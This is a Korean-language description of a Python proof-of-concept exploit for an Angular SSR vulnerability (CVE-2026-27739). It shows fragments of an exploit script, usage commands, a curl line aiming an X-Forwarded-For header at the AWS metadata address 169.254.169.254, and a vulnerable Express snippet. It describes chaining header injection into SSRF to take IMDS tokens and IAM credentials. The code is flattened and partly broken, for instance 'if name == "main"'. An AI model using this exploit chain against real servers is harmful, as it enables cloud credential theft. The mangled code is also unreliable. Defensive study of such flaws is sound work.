
Angular SSR의 CVE-2026-27739을 악용하는 Python PoC: 프로토타입 오염을 통한 헤더 주입 및 자격 증명 탈취를 위한 AWS IMDS/GCP 메타데이터로의 SSRF 체이닝.
curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}
설명: Angular SSR이 프로토타입 체인에 영향을 미치는 안전하지 않은 쿼리 매개변수를 처리함 영향: 요청 헤더 조작, 잠재적 SSRF 연쇄 공격
express-validator 또는 유사 도구 사용def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")
args = parser.parse_args()
exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)
print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")
# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()
if name == "main": main() 사용법 bash
python3 angular_ssr_exploit.py https://target.com
python3 angular_ssr_exploit.py https://target.com --no-ssl-verify 작동 방식 헤더 주입 테스트: Angular SSR이 안전하지 않게 처리할 수 있는 프로토타입 오염 페이로드와 안전하지 않은 전달 헤더를 전송 SSRF 연쇄: X-Forwarded-For/X-Original-URL을 통해 AWS IMDS, GCP 메타데이터, localhost 서비스 접근을 테스트 IMDSv2 토큰 추출: SSRF를 연쇄하여 AWS 메타데이터 토큰을 탈취한 후 IAM 자격 증명 획득 자동 보고: PoC가 포함된 CVSS 점수 기반 모의해킹 보고서 생성 기술 세부사항 근본 원인: Angular Universal SSR 앱은 종종 req.headers를 정제 없이 내부 API로 직접 전달함:
javascript
// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });